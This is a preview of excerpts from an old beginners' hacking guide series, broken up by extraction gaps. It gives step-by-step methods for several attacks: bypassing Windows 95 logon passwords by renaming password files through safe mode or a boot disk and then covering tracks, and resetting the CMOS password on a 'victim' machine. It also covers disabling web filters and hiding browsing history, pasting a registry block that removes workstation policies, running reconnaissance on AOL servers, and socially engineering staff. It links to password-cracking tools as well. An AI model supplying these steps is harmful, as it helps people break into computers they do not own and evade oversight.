Notesale: Turn your study into money

Document Preview

Extracts from the notes are below, to see the PDF you'll receive please use the links above

---

HACKING INTO COMPUTER SYSTEMS
A Beginners Guide
Guides of the Beginner's Series:
So you want to be a harmless hacker?
Hacking Windows 95!
Hacking into Windows 95 (and a little bit of NT lore)!
Hacking from Windows 3
...

Computer hacking
...
He had me on the phone because his father had just taken
away his computer
...
The boy had hoped to impress me with
how "kewl" he was
...
Now the boy wanted my help in getting back on line
...
What if the sysadmin and I had been major grouches? This
kid could have wound up in juvenile detention
...
But that's what some people do to folks who go snooping in other
people's computer accounts -- even when the culprit does no harm
...
But it stops being fun when you end up in a cell with a
roommate named "Spike
...
In this series of Guides we teach
safe hacking so that you don't have to keep looking back over your shoulders for narcs and cop s
...
In fact, many network systems administrators, computer scientists and computer
security experts first learned their professions, not in some college program, but from the hacker culture
...

You, too, can become one of us
...
Heck, if I can do it, anyone can!
Regardless of why you want to be a hacker, it is definitely a way to have fun, impress your friends, and get
dates
...
Take my word for it!;^D

These Guides to (mostly) Harmless Hacking can be your gateway into this world
...

These Guides can equip you to become one of the vigilantes that keeps the Internet from being destroyed
by bad guys
...
Heh, heh, heh
...
You'll learn not to be frightened by silly
hoaxes that pranksters use to keep the average Internet user in a tizzy
...

However, before you plunge into the hacker subculture, be prepared for that hacker attitude
...

So
...

The answer is NO! Hacking can be surprisingly easy! Better yet, if you know how to search the Web, you
can find almost any computer information you need for free
...
The GTMHH Beginners' Series #2 will show you where you can download
special hacker-friendly programs for Windows that are absolutely free
...

Now suppose you want to become an elite hacker? All you will really need is an inexpensive "shell account"
with an Internet Service Provider
...
s I, II, and III of the
GTMHH you can get into Unix hacking seriously
...
In Vol
...
It will even run on a 386
PC with just 2 Mb RAM! Linux is so good that many Internet Service Providers use it to run their systems
...
III we will also introduce Perl, the shell programming language beloved of Uberhackers
...
OK, you could use most of these
exploits to do illegal things
...
You can run any program in this series of Guides on your own computer, or your
(consenting) friend's computer -- if you dare! Hey, seriously, nothing in this series of Guides will actually
hurt your computer, unless you decide to trash it on purpose
...
You can learn how to either exploit them -- or defend your computer
against them!
About the Guides to (mostly) Harmless Hacking
We have noticed that there are lots of books that glamorize hackers
...
Of course we hackers love to perpetuate this myth
because it makes us look so incredibly kewl
...
Mahoun Books, 1994)? They
are full of vague and out of date stuph
...

And if you get on one of the hacker news groups on the Internet and ask people how to do stuph, some of
them insult and make fun of you
...

We see many hackers making a big deal of themselves and being mysterious and refusing to help others
learn how to hack
...
We, too, could enjoy the pleasure of insulting people who ask us how to hack
...
Muhahaha
...
You don't even need to read every single Guide to (mostly) Harmless Hacking in
order to become a hacker
...

But if your plan is to become "elite," you will do better if you read all the Guides, check out the many Web
sites and newsgroups to which we will point you, and find a mentor among the many talented hackers who
post to our Hackers forum or chat on our IRC server at http://www
...
com, and on the Happy Hacker
email list (email hacker@techbroker
...

If your goal is to become an Uberhacker, the Guides will end up being only the first in a mountain of material
that you will need to study
...

How to Not Get Busted
One slight problem with hacking is that if you step over the line, you can go to jail
...
But we are not attorneys or
experts on cyberlaw
...
And these laws keep on
changing
...

However, we have a Guide to (mostly) Harmless Hacking Computer Crime Law Series to help you avoid
some pitfalls
...
If you are about to do something that you
would not like to have done to you, forget it
...

So if you get an idea from the Guides to (mostly) Harmless Hacking that helps you to do something
malicious or destructive, it's your problem if you end up being the next hacker behind bars
...
It won't care that the giant corporation
whose database you filched shafted your best buddy once
...


To some people it may sound like phun to become a national sensation in the latest hysteria over Evil
Genius hackers
...
" These are hacker
slang terms
...
For example, a hacker might spell "elite" as "3l1t3," with 3's substituting
for e's and 1's for i's
...
The Guides sometimes use these slang
spellings to help you learn how to write email like a hacker
...
So we do not guarantee that if you use
this slang, people will read your email and think, "Ohhh, you must be an Evil Genius! I'm sooo impressed!"
Take it from us, guys who need to keep on inventing new slang to prove they are "k-rad 3l1t3" are often
lusers and lamers
...

Most Uberhackers don't use slang, either
...
Are you ready to hack?

GUIDE TO (mostly) HARMLESS HACKING
Beginners' Series #2, Section One
...
BEGINNERS
...
newbie@aol
...
Sort of like how
managers in big corporations don't wear dreadlocks and fraternity boys don't drive Yugos
...
AOL fears Unix because it is the most fabulous, exciting, powerful, hacker-friendly operating system
in the Solar system
...
anyhow, I'd feel crippled without Unix
...

Unfortunately, this attitude is spreading
...

But if you don't have a Unix shell account, you can still hack
...

In this Beginner's Series #2 we cover several fun things to do with Windows and even the most hackerhostile Online services
...
You don't need to be a genius
...
You don't need to won an expensive computer
...

Section One: Customize your Windows 95 visuals
...

Section Two: Subvert Windows nanny programs such as Surfwatch and the setups many schools use in the
hope of keeping kids from using unauthorized programs
...

Section Three: Explore other computers -- OK, let's be blatant -- hack -- from your Windows home computer
using even just AOL for Internet access
...
You decide to show your buddies that you are one
of those dread hacker d00dz
...
" It's kind of lame looking, isn't it? Your computer looks just like everyone else's box
...

Now if you are a serious hacker you would be booting up Linux or FreeBSD or some other kind of Unix on
your personal computer
...
So you have an opportunity to social engineer
them into thinking you are fabulously elite by just by customizing your bootup screen
...
" This turns out to be super easy
...
In fact, they want
this so badly that they have gone to court to try to force computer retailers to keep the Micro$oft bootup
screen on the systems these vendors sell
...
So M$ has tried to hide
the bootup screen software
...
We're going to learn today how to totally
thwart their plans
...
That's what we're doing today
...
sys and/or ip
...
To see this file, open
File Manager, click "view", then click "by file type," then check the box for "show hidden/system files
...
" To the right of the file logo
...
"
These mean this file is "read-only, hidden, system
...

********************************************* **
The easiest way to thwart these Windoze 95 startup and shut down screens is to go to
http://www
...
com/apps/ and check out their programs
...
So here's how to do this without using a canned program
...
It's probably under the accessories folder
...

2) Click "Windows Explorer"
3) Click "Tools"
4) Click "Find"
5) Click "files or folders"
6) After "named" type in "MSPaint"
7) After "Look in" type in 'C:"
8) Check the box that says "include subfolders"
9) Click "find now"
10) Double click on the icon of a paint bucket that turns up in a window
...

11) Within the paint program, click "file"
12) Click "open"
OK, now you have MSPaint
...
sys
...
" This graphic has exactly the right
format to be used for your startup graphic
...


14) Now we play with this picture
...

15) When you decide you really like your picture (fill it with frightening hacker stuph, right?), save it as
c:\logo
...
This will overwrite the Windows startup logo file
...
sys
...
If you want to change the shut down screens, they are easy to find and modify using MSPaint
...
sys
...
sys
...
To make graphics that will be available for your wallpaper, name them something like
c:\windows \evilhaxor
...
")
********************************************************
Evil Genius tip: The Microsoft Windows 95 startup screen has an animated bar at the bottom
...
However, you can make your own animated startup
screen using the shareware program BMP Wizard
...
pippin
...
htm
http://search
...
com/apps/editors
...
windows95
...
html
Or you can download the program LogoMania, which automatically resizes any bitmap to the correct size for
your logon and logoff screens and adds several types of animation as well
...
zdnet
...
zip
********************************************************
Now the trouble with using one of the existing Win95 logo files is that they only allow you to use their
original colors
...
First click "Image," then click "attributes
...
Make sure under Units that Pels is selected
...
Remember to save the file as c:\logo
...
sys and or c:\windows\logos
...

But if you want some really fabulous stuff for your starting screen, you can steal graphics from your favorite
hacker page on the Web and import them into Win95's startup and shutdown screens
...

1) Wow, kewl graphics! Stop your browsing on that Web page and hit the "print screen" button
...

3) Click edit, then click paste
...

4) When you save it, make sure attributes are still 320X400 Pels
...
sys, c:\windows \logow
...
sys, or c:\winodws\evilhaxor
...

Of course you can do the same thing by opening any graphics file you choose in MSPaint or any other
graphics program, so long as you save it with the right file name in the right directory and size it 320X400
Pels
...
Just change the name of c:logo
...
Something like
logo
...
Guess what happens? Those Microsoft guys figured we'd be doing things like this and hid a copy
of their boring bootup screen in a file named "io
...
" So if you rename or delete their original logo
...

Now suppose your Win95 box is attached to a local area network (LAN)? It isn't as easy to change your
bootup logo, as the network may override your changes
...
If you
aren't afraid of your boss seeing your "K-Rad Dommsters of the Apocalypse" spashed over an x-rated
backdrop, here's how to customize your bootup graphics
...
95 policy editor
(comes on the 95 cd) with the default admin
...
Use the policy editor to open the registry, select 'local
computer' select network, select 'logon' and then selet 'logon banner'
...


**************************************
Evil genius tip: Want to mess with io
...
sys? Here's how to get into them
...

Click "Start" then "Programs" then "MS-DOS
...
SYS
ATTRIB -R -H -S C:\LOGO
...
MSPaint only opens graphics files
...
sys and logo
...

**************************************
OK, that's it for now
...
I warned you
...
K-Rad
Doomsters of the apocalypse, yesss!

GUIDE TO (mostly) HARMLESS HACKING
Beginners' Series #2, Section Two
...
BEGINNERS
...

PARENTAL DISCRETION ADVISED!
This lesson will lay the foundation for learning how to hack what now is the most commonly installed
workstation operating system: Windows NT
...
So if you want to call yourself a serious hacker, you'd
better get a firm grasp on Win NT
...

In this lesson we explore:
· Several ways to hack your Windows 95 logon password
· How to hack your Pentium CMOS password
· How to hack a Windows Registry -- which is where access control on Windows-based LANs, intranets
and Internet and Webs servers are hidden!
Let's set the stage for this lesson
...
You've already put in a really industrial haxor-looking bootup screen, so they are already
trembling at the thought of what a tremendously elite d00d you are
...
" Tell your friends
your password and get them to enter a secret new one
...
That's because you'll say "Sheesh, you
call that password protection? Any idiot can break into a Win 95 box! And of course you're right
...
Remember this next time you expect to keep something on your Win95 box confidential
...
The funny
thing is that very few hackers mess with NT today because they're all busy cracking into Unix boxes
...
Once you see how easy it is to
break into your Win 95 box, you'll feel in your bones that even without us holding your hand, you could
discover ways to crack Win NT boxes, too
...
Maybe you'll want them to turn their
backs so all they know is you can break into a Win95 box in less than one minute
...

But first, here's a warning
...

But, especially in corporate local area networks (LANs), several of these techniques don't work
...
But we'll start with the easy ways first
...

Step two: When the "system configuration" screen comes up, press the "F5" key
...

If your Win 95 has the right settings, this boots you into "safe mode
...

Too easy! OK, if you want to do something that looks a little classier, here's another way to evade that new
password
...

Step two: when you get to the "system configuration" screen, press the F8 key
...

Step three: choose number 7
...
At the prompt, give the command "rename
c:\windows \*pwl c:\windows \*zzz
...
It is a command-line operating system, meaning that you get a prompt (probably c:\>) after which
you type in a command and press the enter key
...
It is a little bit similar to
Unix, and in fact in its first version it incorporated thousands of lines of Unix code
...
You will get the password dialog screen
...
It will ask you to reenter it to confirm your new password
...
Your friends are smart enough to suspect you just created a new password, huh? Well, you can
put the old one your friends picked
...
zzz back to *
...

Step six: reboot and let your friends use their secret password
...
If someone where to be sneaking around another person's Win 95 computer, using this
technique, the only way the victim could determine there had been an intruder is to check for recently
changed files and discover that the *
...
sys file bootkeys=0 option is active, the keys that can do something
during the bootup process are F4, F5, F6, F8, Shift+F5, Control+F5 and Shift+F8
...
You can still
break in
...
Besides, it's phun to show your friends how to use the boot keys and then disable these so
when they try to mess with your computer they will discover you've locked them out
...
But we're hackers, so we can pull a fast trick to do the same thing
...
sys file, which controls the boot sequence
...
sys File:
Step zero: Back up your computer completely, especially the system files
...
We are about to play with fire! If you are doing this on someone else's computer, let's just
hope either you have permission to destroy the operating system, or else you are so good you couldn't
possibly make a serious mistake
...
If you
don't already have a Win 95 boot disk, here's how to make one
...
Click on Start, then Settings,
then Control Panel, then Add/Remove Programs, then Startup Disk
...

********************************
Step one: Find the file msdos
...
It is in the root directory (usually C:\)
...
sys
...
sys writable
...
sys, then left click "properties
...
You have now made this a
file that you can pull into a word processor to edit
...
sys up in Word Pad
...
Find msdos
...
Then click "associate" under the "file" menu
...
" It is very important to
use Word Pad and not Notepad or any other word processing program! Then double click on msdos
...

Step four: We are ready to edit
...
sys loaded
...

;Do not remove them (MSDOS>SYS needs to be >1024 bytes)
...


...


To disable the function keys during bootup, directly below [Options] you should insert the command
"BootKeys=0
...
You can really mess up
your snoopy hacker wannabe friends by putting in both statements and hope they don't know about
BootDelay
...
sys
...
sys is absolutely essential to your computer, you'd better write protect it like it was
before you edited it
...
sys
...
sys, then left click "properties
...
Check "read only
...
When you next boot up, your virus scanner will see that
msdos
...
It will assume the worst and want to make your msdos
...
You have to stop it from doing this
...
"
Hard Way to Edit your (or someone else's) Msdos
...

Step zero
...
Put a Win 95 boot disk in the a: drive
...
This gives you a DOS prompt A:\
...
sys writable
...
sys"
(This assumes the c: drive is the boot disk
...
sys" This brings up this file into the word processor
...
sys
...
Exit the edit program
...
sys" to return the msdos
...

OK, now your computer's boot keys are disabled
...

As you may have guessed from the "Hard Way to Edit your Msdos
...

How to Break into a Win 95 Box Using a Boot Disk
Step one: shut down your computer
...

Step three: boot up
...
pwl c:\windows\*
...

Step four: boot up again
...

Step five: Cover your tracks by renaming the password files back to what they were
...
This is a common trick on LANs where the network
administrator doesn't want to have to deal with people monkeying around with each others' computers
...

How to Mess With CMOS #1
The basic settings on your computer such as how many and what kinds of disk drives and which ones are
used for booting are held in a CMOS chip on the mother board
...
On a home computer it will typically be set to first look in the A: drive
...

On my computer, if I want to change the CMOS settings I press the delete key at the very beginning of the
bootup sequence
...

If I don't want someone to boot from the A: drive and mess with my password file, I can set it so it only
boots from the C: drive
...

So, is there a way to break into a Win 95 box that won't boot from the A: drive? Absolutely yes! But before
trying this one out, be sure to write down *ALL* your CMOS settings
...
Hacking CMOS is even more destructive than hacking system files
...

Step two: open up your victim
...

Step four: plug the battery back in
...
Look
for a jumper close to the battery or look at your manual if you have one
...
If you move the jumper to
pins two and three and leave it there for over five seconds, it may reset the CMOS
...
Put everything back the way
they were, with the exception of setting it to first check the A: drive when booting up
...
Whatever you do, don't tell the sysadmin or your boss that "The Happy Hacker made me do it"!
*******************************
Step six: proceed with the A: drive boot disk break-in instructions
...

How to Mess with CMOS #2

Boy, I sure hope you decided to read to the end of this GTMHH before taking solder gun to your
motherboard
...
It's a program called KillCMOS
which you can download from http://www
...
com
...


Now suppose you like to surf the Web but your Win 95 box is set up so some sort of net nanny program
restricts access to places you would really like to visit
...

There are several ways to evade those programs that censor what Web sites you visit
...
The sad fact
is that these net censorship programs have no way of evaluating everything on the Web
...
This keeps kids form discovering many
wonderful things on the Web
...
But these Web censor programs are a poor substitute for spending time with your kids so that they
learn how to use computers responsibly and become really dynamite hackers! Um, I mean, become
responsible cyberspace citizens
...

The first tactic to use with a Web censor program is hit control-alt-delete
...
If the
censorship program is on the list, turn it off
...
bat file to delete any mention of the web censor program
...

But what if your parents (or your boss or spouse) is savvy enough to check where you've been surfing?
You've got to get rid of those incriminating records whowing that you've been surfing Dilbert!
It's easy to fix with Netscape
...
ini with either Notepad or Word Pad
...
ini
...
Delete those lines
...

Editing the Registry is the only way (that I have found, at least) to defeat the censorship feature on Internet
Explorer
...
Brrrr!
*************************
Newbie note: Registry! It is the Valhalla of those who wish to crack Windows
...
Whoever controls the Registry of a Win 95 or
Win NT box controls that computer -- totally
...

'em
How to edit the Registry:
Step zero: Back up all your files
...
If you mess up the Registry badly enough you
may have to reinstall your operating system
...
Figure out how to edit the Registry of a LAN
server at work and you may be in real trouble
...
Get permission before you mess with Registries of computers you don't own
...
This is not simple, because the Microsoft theory is what you don't know won't
hurt you
...
But, hey, we don't care if we totally trash
our computers, right? So we click Start, then Programs, then Windows Explorer, then click on the Windows
directory and look for a file named "Regedit
...
"
Step two: Run Regedit
...
It brings up several folders:
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
What we are looking at is in some ways like a password file, but it's much more than this
...
If
you are used to Unix, you are going to have to make major revisions in how you view file permissions and
passwords
...

****************************
Evil genius tip: You can run Regedit from DOS from a boot disk
...

****************************
Step three
...
Let's check out CURRENT_USER by clicking the plus sign
to the left of it
...
See how the Regedit gives you menu choices to pick new settings
...
All you see is pictures with no clue of who these files look in
DOS
...
" This isn't how hackers edit the Registry
...
Now we get act like real hackers
...
First click the HKEY_CLASSES_ROOT line to highlight it
...
Click it, then choose "Export Registry File
...
reg"
...
Open that part of the Registry in Word Pad
...
One way is to right click on it from Explorer
...
If you were messing
with it and accidentally left click, you could trash your computer big time
...
Things that look like:
[HKEY_CLASSES_ROOT\htmlctl
...
PasswordCtl
...
PasswordCtl
...
PasswordCtl
...
What it does in encrypt the
password when you enter it, then compare it with the unencrypted version on file
...
I say delete them all! Of course this
means your stored passwords for logging on to your ISP, for example, may disappear
...
Someone
may have tried to tamper with it
...
It's a good idea to know how to use your boot disk to reinstall
Win 95 it this doesn't work out
...
You can also delete the files
c:\windows \cookies\mm2048
...
dat
...

Step nine
...
reg files back into the Regis try
...
reg files in Explorer or else use
the "Import" feature next to the "Export" you just used in Regedit
...
reg extension
...
Erase the Registry and its backups
...
dat, user
...
da0 and user
...
Your operating system will immediately commit suicide
...
But if you really have guts, just kill those files and shut it down
...
Reinstall Windows 95
...
Hope they don't check Internet Explorer to see if the censorship program still is
enabled
...
Blame it on Microsoft security -- or on parents being too busy
to teach their kids right from wrong
...
You just got a little taste of what it will be like here, done on the safety of
your home computer
...

Now you don't have to take my work for it, you know first hand how disastrous a clumsy hacker can be
when messing in someone else's computer systems
...
It's
easy to disconnect so you can still boot the box
...

In fact, if you have physical access to *ANY* computer, the only way to keep you from breaking into it is to
encrypt its files with a strong encryption algorithm
...

We haven't gone into all the ways to break into a Win 95 box remotely, but there are plenty of ways
...

And the ways to evade Web censor programs are so many, the only way you can make them work is to
either hope your kids stay dumb, or else that they will voluntarily choose to fill their minds with worthwhile
material
...

******************************
Evil Genius tip: Want to trash most of the policies can be invoked on a workstation running Windows 95?
Paste these into the appropriate locations in the Registry
...

[HKEY_LOCAL_MACHINE\Network\Logon]
[HKEY_LOCAL_MACHINE\Network\Logon]
"MustBeValidated"=dword:00000000
"username"="ByteMe"
"UserProfiles"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft \Windows\CurrentVersion\Policies]
"DisablePwdCaching"=dword:00000000
"HideSharePwds"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft \Windows\CurrentVersion\Policies\Explorer]
"NoDrives"=dword:00000000
"NoClose"=dword:00000000
"NoDesktop"=dword:00000000
"NoFind"=dword:00000000
"NoNetHood"=dword:00000000
"NoRun"=dword:00000000
"NoSaveSettings"=dword:00000000
"NoRun"=dword:00000000
"NoSaveSettings"=dword:00000000
"NoSetFolders"=dword:00000000
"NoSetTaskbar"=dword:00000000
"NoAddPrinter"=dword:00000000
"NoDeletePrinter"=dword:00000000
"NoPrinterTabs"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft \Windows\CurrentVersion\Policies\Network]
"NoNetSetup"=dword:00000000
"NoNetSetupIDPage"=dword:00000000
"NoNetSetupSecurityPage"=dword:00000000

"NoEntireNetwork"=dword:00000000
"NoFileSharingControl"=dword:00000000
"NoPrintSharingControl"=dword:00000000
"NoWorkgroupContents"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft \Windows\CurrentVersion\Policies\System]
[HKEY_CURRENT_USER\Software\Microsoft \Windows\CurrentVersion\Policies\System]
"NoAdminPage"=dword:00000000
"NoConfigPage"=dword:00000000
"NoDevMgrPage"=dword:00000000
"NoDispAppearancePage"=dword:00000000
"NoDispBackgroundPage"=dword:00000000
"NoDispCPL"=dword:00000000
"NoDispScrSavPage"=dword:00000000
"NoDispSettingsPage"=dword:00000000
"NoFileSysPage"=dword:00000000
"NoProfilePage"=dword:00000000
"NoPwdPage"=dword:00000000
"NoSecCPL"=dword:00000000
"NoVirtMemPage"=dword:00000000
"DisableRegistryTools"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft \Windows\CurrentVersion\Policies\WinOldApp
[END of message text]
[Already at end of message]
PINE 3
...

Hacking from Windows 3
...

· Telnet to computers that will let you use the invaluable hacker tools of whois, nslookup, and dig
...


· Use Internet Explorer to evade restrictions on what programs you can run on your school or work
computers
...
I'll bet
already they have quit reading this and are furiously emailing me flames and making phun of me in 2600
meetings
...
They'll tell you to go away and
don't come back until you're armed with a shell account or some sort of Unix on your PC
...
Shoot, most of the time hacking from Windoze is like using a 1969 Volkswagon to
race against a dragster using one of VP Racing's high-tech fuels
...
Some of your best tools for probing and
manipulating Windows networks are found only on Windows NT
...

In fact, if you want to become a serious hacker, you eventually will have to learn Windows
...
An IDC report projects that the Unix-based Web
server market share will fall from the 65% of 1995 to only 25% by the year 2000
...
This weak future for Unix Web servers is reinforced by an IDC report reporting
that market share of all Unix systems is now falling at a compound annual rate of decline of -17% for the
foreseeable future, while Windows NT is growing in market share by 20% per year
...
)
So if you want to keep up your hacking skills, you're going to have to get wise to Windows
...

Besides, even poor, pitiful Windows 95 now can take advantage of lots of free hacker tools that give it
much of the power of Unix
...

Can I still learn how to hack?"
Yes, yes, yes!
The secret to hacking from AOL/Win 95 -- or from any on-line service that gives you access to the World
Wide Web -- is hidden in Win 95's MS-DOS (DOS 7
...

DOS 7
...
But you're getting the chance to learn these hidden features today
...
Then minimize your
Web browser and prepare to hack! Next, bring up your DOS window by clicking Start, then Programs, then
MS-DOS
...
If your DOS comes up as a full
screen, hold down the Alt key while hitting enter, and it will go into a window
...

Now you have the option of eight TCP/IP utilities to play with: telnet, arp, ftp, nbtstat, netstat, ping, route,
and tracert
...
You can also access the telnet program directly from Windows
...

With the DOS telnet you can actually port surf almost as well as from a Unix telnet program
...

First, we'll try out logging on to a strange computer somewhere
...
Honest, I just tried this out on a neighbor
...
" This brings up a telnet screen
...

This brings up a box that asks you for "Host Name
...
internic
...
Below that it
asks for "Port" and has the default value of "telnet
...
Below that is a
box for "TermType
...

The first thing you can do to frighten your neighbors and impress your friends is a "whois
...
Then at this InterNIC prompt, type in the last two
parts of your friend's email address
...
com," type in "aol
...
"
Now I'm picking AOL for this lesson because it is really hard to hack
...

For AOL we get the answer:
[vt100] InterNIC > whois aol
...

Connected to the rs Database
America Online (AOL-DOM)
12100 Sunrise Valley Drive
Reston, Virginia 22091
USA
Domain Name: AOL
...
COM
703/453-4255 (FAX) 703/453-4102
Technical Contact, Zone Contact:
America Online (AOL-NOC) trouble@aol
...
COM
703-453-4160 (FAX) 703-453-4001
Record last updated on 13-Mar-97
...

Domain servers in listed order:
DNS-01
...
COM
DNS-02
...
COM
DNS-AOL
...
NET

152
...
199
...
163
...
56
198
...
210
...
If we want to
hack AOL, these are a good place to start
...
"Aol
...

*********************************
*********************************
Evil genius tip: Using your Win 95 and an Internet connection, you can run a whois query from many other
computers, as well
...

Example: telnet to nic
...
mil, port 43
...
AOL
...
However, this only works on computers that are running the whois service on port
43
...
They just saw you accessing a
US military computer! But it's OK, nic
...
mil is open to the public on many of its ports
...
nic
...
mil and its ftp site, too -- they are a mother lode of information that is good for hacking
...
AOL
...
So it's a safe bet this
computer is behind the AOL firewall
...
A port is
any way you get information into or out of a computer
...
Port 25 is used to send email
...
There are thousands of
designated ports, but any particular computer may be running only three or four ports
...

**********************************
So what do we do next? We close the telnet program and go back to the DOS window
...
163
...
42
...
AOL
...
"
Either way we'll get the same result
...
Here's what
we get:
C:\WINDOWS>tracert 152
...
199
...
aol
...
163
...
42]
over a maximum of 30 hops:
1
2
3
4
5

*
*
* Request timed out
...
134
...
201
375 ms 299 ms 196 ms glory-cyberport
...
westnet
...
134
...
33]
271 ms * 201 ms enss365
...
org [129
...
1
...
cnss116
...
t3
...
net [192
...
74
...
t112-0
...
t3
...
net [140
...
112
...
t64-0
...
t3
...
net [140
...
65
...
t80-1
...
t3
...
net [140
...
65
...
t60-0
...
t3
...
net [140
...
61
...
25
...
189
*
*
* Request timed out
...

207
...
134
...


What the heck is all this stuff? The number to the left is the number of computers the route has been traced
through
...
Since a message can take a different length of time every time you send it, tracert times the
trip three t imes
...
" After the timing info
comes the name of the computer the message reached, first in a form that is easy for a human to remember,
then in a form -- numbers -- that a computer prefers
...

Let's try the second AOL domain server
...
163
...
56
Tracing route to dns-02
...
com [152
...
199
...

2 142 ms 140 ms 137 ms 204
...
78
...
nm
...
net [204
...
78
...
nm
...
121
...
3]
5 475 ms 278 ms 325 ms h4-0
...
Albuquerque
...
ans
...
103
...

45]
6 181 ms 187 ms 290 ms f2
...
Albuquerque
...
ans
...
222
...
22
1]
7 162 ms 217 ms 199 ms h14
...
Houston
...
ans
...
223
...
9]
8 210 ms 212 ms 248 ms h14
...
St-Louis
...
ans
...
223
...
14]
9 207 ms * 208 ms h12
...
Reston
...
ans
...
223
...
9]
10 338 ms 518 ms 381 ms 207
...
134
...

12 *
*
* Request timed out
...
25
...
189 reports: Destination net unreachable
...
t60-0
...
t3
...
net
...
But
we notice that h12
...
Reston
...
ans
...
t80-1
...
t3
...
net, h14
...
Houston
...
ans
...
t3
...
net all have numerical names beginning with 140, and names that end with "ans
...
" So
it's a good guess that they all belong to the same company
...

Next let's check out that final AOL domain server:
C:\WINDOWS>tracert 198
...
210
...
ans
...
83
...
28]
over a maximum of 30 hops:

1 *
*
*
2 138 ms 145 ms
3 212 ms 191 ms
4 166 ms 228 ms
5 148 ms 138 ms
45]
6 284 ms 296 ms
1]
7 298 ms 279 ms
8 238 ms 234 ms
9 301 ms 257 ms

Request timed out
...
134
...
201
181 ms glory-cyberport
...
westnet
...
134
...
33]
189 ms enss365
...
org [129
...
1
...
cnss116
...
t3
...
net [192
...
74
...
t112-0
...
t3
...
net [140
...
112
...
t64-0
...
t3
...
net [140
...
65
...
t104-0
...
t3
...
net [140
...
65
...
ans
...
83
...
28]

Trace complete
...
Louis and Reston
...
net addresses with T3s, so this last
nameserver is using the same network as the others
...
com really wondering if you could actually break into his
account? We're going to do some port surfing on this last AOL domain name server! But to do this we need
to change our telnet settings a bit
...
In the preferences box you need to check "Local echo
...
For some reason, some of
the messages a remote computer sends to you won't show up on your Win 95 telnet screen unless you
choose the local echo option
...
For example, if you type in "hello" the telnet screen may show you "heh lelllo o
...

Now click on Connect, then Remote System
...
ans
...
Below it, for Port choose Daytime
...

Aha! We now know that dns -aol
...
net is exposed to the world, with at least one open port, heh, heh
...
And now your friend is wondering, how did you get something
out of that computer?
******************************
Clueless newbie alert: If everyone who reads this telnets to the daytime port of this computer, the sysadmin
will say "Whoa, I'm under heavy attack by hackers!!! There must be some evil exploit for the daytime
service! I'm going to close this port pronto!" Then you'll all email me complaining the hack doesn't work
...

******************************
Now let's check out that Reston computer
...
t600
...
t3
...
net
...
This is a seriously locked down box! What do
we do next?
So first we remove that "local echo" feature, then we telnet back to whois
...
We ask about this
ans
...
net

Connecting to the rs Database
...
(ANS-DOM)
100 Clearbrook Road
Elmsford, NY 10523
Domain Name: ANS
...
NET
(914) 789-5337
Technical Contact:
ANS Network Operations Center (ANS-NOC) noc@ans
...
NET
(800)456-6300 fax: (914)789-5310

Record last updated on 03-Jan-97
...

Domain servers in listed order:
NS
...
NET
NIS
...
NET

192
...
63
...
225
...
2

Now if you wanted to be a really evil hacker you could call that 800 number and try to social engineer a
password out of somebody who works for this network
...
net passwords
...

Anyhow, you get the idea of how you can hack around gathering info that leads to the computer that
handles anyone's email
...
should I tell you about killer ping? It's a good way to lose your job and end up in jail
...
Find the gory details in the GTMHH Vol
...
Fortunately most systems administrators have patched things
nowadays so that killer ping won't work
...
It's sort of like tracert, but all it does is time how long a
message takes from one computer to another, without telling you anything about the computers between
yours and the one you ping
...
This one is really lame
...
Get a shareware Ftp program from one of the
download sites listed below
...

Since these are semi-secret commands, you can't get any details on how to use them from the DOS help
menu
...

· For arp, nbtstat, ping and route, to get help just type in the command and hit enter
...

· Telnet has a help option on the tool bar
...

Now suppose you are at the point where you want to do serious hacking that requires commands other than
these we just covered, but you don't want to use Unix
...
This is because I'm ornery
...

So what is your next option for doing serious hacking from Windows?
How would you like to crack Win NT server passwords? Download the free Win 95 program NTLocksmith,
an add-on program to NTRecover that allows for the changing of passwords on systems where the
administrative password has been lost
...
Get both NTLocksmith and
NTRecover -- and lots more free hacker tools -- from http://www
...
com
...

**********************************
How would you like to trick your friends into thinking their NT box has crashed when it really hasn't? This
prank program can be downloaded from http://www
...
com/insider/insdrcod
...

*********************************
You can get punched in the nose warning: need I say more?
*********************************
But by far the deadliest hacking tool that runs on Windows can be downloaded from, guess what?
http://home
...
com
That deadly program is Internet Explorer 3
...
Unfortunately, this program is even better for letting other
hackers break into your home computer and do stuff like make your home banking program (e
...
Quicken)
transfer your life savings to someone in Afghanistan
...
You see, Internet Explorer is really an alternate Windows
shell which operates much like the Program Manager and Windows Explorer that come with the Win 94 and
Win NT operating systems
...
Or any program to which you
have access on your LAN
...
The big deal about
Internet Explorer being a Windows shell is that Microsoft never told anyone that it was in fact a shell
...
By contrast, the Netscape and Mosaic Web browsers are not shells
...

***********************************
To use Internet Explorer as a Windows shell, bring it up just like you would if you were going to surf the
Web
...

Whoa, look at all those file folders that come up on the screen
...
Now for fun, click "Program Files" then click "Accessories" then click
"MSPaint
...
Now paint your friends who are watching this hack very
surprised
...
Click on the Windows folder, then click on
Regedit
...
Export the password file (it's in HKEY_CLASSES_ROOT)
...

Remember, the ability to control the Registry of a server is the key to controlling the network it serves
...
In a few hours the Secret Service will be fighting with the FBI on your front lawn over who
gets to try to bust you
...

So how can you use Internet Explorer as a hacking tool? One way is if you are using a computer that
restricts your ability to run other programs on your computer or LAN
...
If it does, run it and try entering disk
drive names
...

Next cool hack: try automated port surfing from Windows! Since there are thousands of possible ports that
may be open on any computer, it could take days to fully explore even just one computer by hand
...
netcop
...

Now suppose you want to be able to access the NTFS file system that Windows NT uses from a Win 95 or
even DOS platform? This can be useful if you are wanting to use Win 95 as a platform to hack an NT
system
...
ntinternals
...
htm offers a program that allows Win 95 and DOS to recognize
and mount NTFS drives for transparent access
...
It would take
megabytes to write even one sentence about each and every one of them
...
Following is a list of sites where you can
download lots of free and more or less harmless programs that will help you in your hacker career:
ftp://ftp
...
com
ftp://ftp
...
net
http://hertz
...
edu/%7ebxg3442/temp
...
alpworld
...
html
http://www
...
com/nettools
...
eskimo
...
html
http://www
...
com/siliconvalley/park/2613/links
...
ilf
...
islandnet
...
simtel
...
net
http://www
...
net/cwsapps/cwsa
...
trytel
...
tucows
...
windows95
...
southwind
...
html

GUIDE TO (mostly) HARMLESS HACKING
Beginners' Series #3 Part 1
